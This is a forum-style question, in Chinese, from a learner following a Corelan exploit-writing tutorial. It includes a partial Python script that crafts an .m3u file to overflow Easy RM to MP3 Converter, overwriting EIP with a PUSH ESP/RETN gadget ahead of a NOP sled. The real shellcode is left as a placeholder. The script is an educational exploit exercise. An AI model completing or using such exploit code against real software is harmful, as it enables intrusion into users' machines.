我正在做corelan课程,但是我被困在教程#2 push ret中,我试图用push esp ret覆盖我的eip以便在这种情况下覆盖我的shellcode calc.exe,但是它总是被nops覆盖。我认为代码是正确的,但我缺少一些内容。
payload = junk+eip+prependesp+shellcode
漏洞利用结构
#!/usr/bin/env python
import struct
# Popcalc for Easy RM to MP3 Converter
#
# Corelan Exploit Writing Tutorial 2
outfile = 'popcalc_exploit_push_ret.m3u'
# Just some junk at the beginning
junk = '\x41' * 26066
#018757F6 54 PUSH ESP
#018757F7 C3 RETN
eip = struct.pack("<L",0x018757F6) # overwrite EIP with push esp, ret
# Some junk so ESP points to shellcode
prependesp = 'B' * 4
# nop sled
shellcode = '\x90' * 25
#real shellcode
shellcode = shellcode
结果需要使用push esp覆盖EIP,然后重新启动calc,但是它不起作用。它总是覆盖停下来的地方
